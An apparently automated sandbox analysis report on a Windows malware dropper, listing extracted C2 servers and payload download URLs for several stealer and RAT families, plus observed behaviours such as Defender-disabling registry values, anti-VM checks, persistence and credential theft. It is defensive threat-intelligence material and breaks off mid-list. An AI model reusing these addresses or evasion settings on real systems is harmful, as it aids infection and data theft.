Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
19-02-2025 06:02
Static task
static1
Behavioral task
behavioral1
Sample
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
Resource
win10v2004-20250217-en
General
-
Target
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
-
Size
2.0MB
-
MD5
41bfbce19932e1a75259a03ba23bdd33
-
SHA1
af829594dc191d8dc5f0bcdde496d1b98130d754
-
SHA256
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989
-
SHA512
cd22466d28e428f54be72326d3475065711d64e637d03a1c043e66591cd6508b8a88ba1e1fb0b34b48275b6cd5e8ad17346ad032a77d2c87e44fd129e4ff538d
-
SSDEEP
49152:dOcb9F16Y7tPT0JCy0wzbtpFfUrSv/YVNNHAqo:koV7t70JCyCuv/uBo
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Signatures
-
Amadey family
-
Detect Vidar Stealer 25 IoCs
resource yara_rule behavioral1/memory/2044-180-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-174-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-171-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-169-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-167-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-288-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-307-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-326-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-345-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-455-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-480-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-483-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-528-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-548-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-557-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-558-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-580-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-599-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-612-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-636-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-637-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-705-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-791-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-814-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/2044-844-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000500000001a4e2-257.dat family_xworm behavioral1/memory/2232-266-0x0000000000F00000-0x0000000000F10000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2908-747-0x0000000000E00000-0x000000000126A000-memory.dmp healer behavioral1/memory/2908-746-0x0000000000E00000-0x000000000126A000-memory.dmp healer behavioral1/memory/2908-1005-0x0000000000E00000-0x000000000126A000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE -
Stealc family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 27e8838a56.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bb075283c5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bb6617c10a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad82802eed.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oaglv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d33bacfc5a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dcda83bfaa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ef15b74a70.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oaglv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE -
Blocklisted process makes network request 6 IoCs
flow pid Process 55 1016 3omTNLZ.exe 57 1016 3omTNLZ.exe 59 1016 3omTNLZ.exe 70 2808 powershell.exe 90 1920 powershell.exe 113 1288 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2808 powershell.exe 1920 powershell.exe 1288 powershell.exe 868 powershell.exe 1552 powershell.exe 1228 powershell.exe -
Downloads MZ/PE file 24 IoCs
flow pid Process 56 1976 skotes.exe 56 1976 skotes.exe 56 1976 skotes.exe 56 1976 skotes.exe 56 1976 skotes.exe 70 2808 powershell.exe 90 1920 powershell.exe 103 1864 futors.exe 113 1288 powershell.exe 203 1864 futors.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe 5 1976 skotes.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1664 chrome.exe 2904 chrome.exe 2932 chrome.exe 1188 chrome.exe -
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oaglv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bb6617c10a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dcda83bfaa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oaglv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oaglv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 27e8838a56.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 27e8838a56.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bb6617c10a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oaglv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d33bacfc5a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bb075283c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bb075283c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ef15b74a70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad82802eed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad82802eed.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d33bacfc5a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ef15b74a70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dcda83bfaa.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe -
Executes dropped EXE 39 IoCs
pid Process 1976 skotes.exe 2912 Ta3ZyUR.exe 2804 Ta3ZyUR.exe 1076 qFqSpAp.exe 1876 m5UP2Yj.exe 1572 7aencsM.exe 2044 7aencsM.exe 2232 C3hYpvm.exe 2012 oVpNTUm.exe 1016 3omTNLZ.exe 2516 amnew.exe 1864 futors.exe 1956 72426d1546.exe 2884 oaglv.exe 2908 TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE 2580 ad82802eed.exe 1692 27e8838a56.exe 1340 483d2fa8a0d53818306efeb32d3.exe 1076 monthdragon.exe 2896 monthdragon.exe 2140 d33bacfc5a.exe 1780 19338d89d6.exe 2360 dcc3187c3d.exe 4040 TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE 3360 a9c940aa2d.exe 3732 bb075283c5.exe 3888 ef15b74a70.exe 4040 586e2a0f18.exe 3840 bb6617c10a.exe 3956 b2b14b4ec3.exe 2972 dcda83bfaa.exe 3896 Ta3ZyUR.exe 3848 Ta3ZyUR.exe 2392 d2YQIJa.exe 2376 3omTNLZ.exe 3656 7aencsM.exe 1876 7aencsM.exe 2316 DTQCxXZ.exe 1796 oaglv.exe -
Identifies Wine through registry keys 2 TTPs 19 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine bb6617c10a.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine oaglv.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine ad82802eed.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine dcda83bfaa.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 27e8838a56.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine d33bacfc5a.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine bb075283c5.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine ef15b74a70.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine oaglv.exe -
Loads dropped DLL 64 IoCs
pid Process 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 1976 skotes.exe 2912 Ta3ZyUR.exe 2940 WerFault.exe 2940 WerFault.exe 2940 WerFault.exe 2940 WerFault.exe 2940 WerFault.exe 1976 skotes.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 1976 skotes.exe 1976 skotes.exe 1572 7aencsM.exe 2800 WerFault.exe 2800 WerFault.exe 2800 WerFault.exe 2800 WerFault.exe 2800 WerFault.exe 1976 skotes.exe 1652 WerFault.exe 1652 WerFault.exe 1652 WerFault.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 2516 amnew.exe 1976 skotes.exe 2808 powershell.exe 2808 powershell.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1920 powershell.exe 1920 powershell.exe 1864 futors.exe 1864 futors.exe 1076 monthdragon.exe 536 WerFault.exe 536 WerFault.exe 536 WerFault.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1288 powershell.exe 1288 powershell.exe 1864 futors.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 1864 futors.exe 1976 skotes.exe 1976 skotes.exe 1976 skotes.exe 3896 Ta3ZyUR.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\27e8838a56.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086950001\\27e8838a56.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\19338d89d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086952001\\19338d89d6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\bb6617c10a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008230101\\bb6617c10a.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\72426d1546.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086933101\\72426d1546.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086934021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\d33bacfc5a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086951001\\d33bacfc5a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dcc3187c3d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086953001\\dcc3187c3d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\a9c940aa2d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008220101\\a9c940aa2d.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ef15b74a70.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000900000001c8a6-604.dat autoit_exe behavioral1/files/0x000400000001ca57-1011.dat autoit_exe behavioral1/files/0x000500000001caed-1076.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 1976 skotes.exe 1876 m5UP2Yj.exe 2012 oVpNTUm.exe 1016 3omTNLZ.exe 2884 oaglv.exe 2908 TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE 2580 ad82802eed.exe 1692 27e8838a56.exe 1340 483d2fa8a0d53818306efeb32d3.exe 2140 d33bacfc5a.exe 4040 TempMJLDUKZQ9YE0DVBOIKZ7UXGLYCLFKOLF.EXE 3732 bb075283c5.exe 3888 ef15b74a70.exe 3840 bb6617c10a.exe 2972 dcda83bfaa.exe 2392 d2YQIJa.exe 2376 3omTNLZ.exe 1796 oaglv.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 2912 set thread context of 2804 2912 Ta3ZyUR.exe 33 PID 1572 set thread context of 2044 1572 7aencsM.exe 40 PID 1076 set thread context of 2896 1076 monthdragon.exe 97 PID 3896 set thread context of 3848 3896 Ta3ZyUR.exe 156 PID 3840 set thread context of 3920 3840 bb6617c10a.exe 160 PID 3656 set thread context of 1876 3656 7aencsM.exe 162 PID 2972 set thread context of 1612 2972 dcda83bfaa.exe 164 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\oaglv.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\oaglv.job oVpNTUm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 2940 2912 WerFault.exe 32 2572 1076 WerFault.exe 36 2800 1572 WerFault.exe 39 1652 1876 WerFault.exe 38 536 1076 WerFault.exe 96 3908 3896 WerFault.exe 155 2320 3656 WerFault.exe 161 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad82802eed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language a9c940aa2d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72426d1546.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d33bacfc5a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened 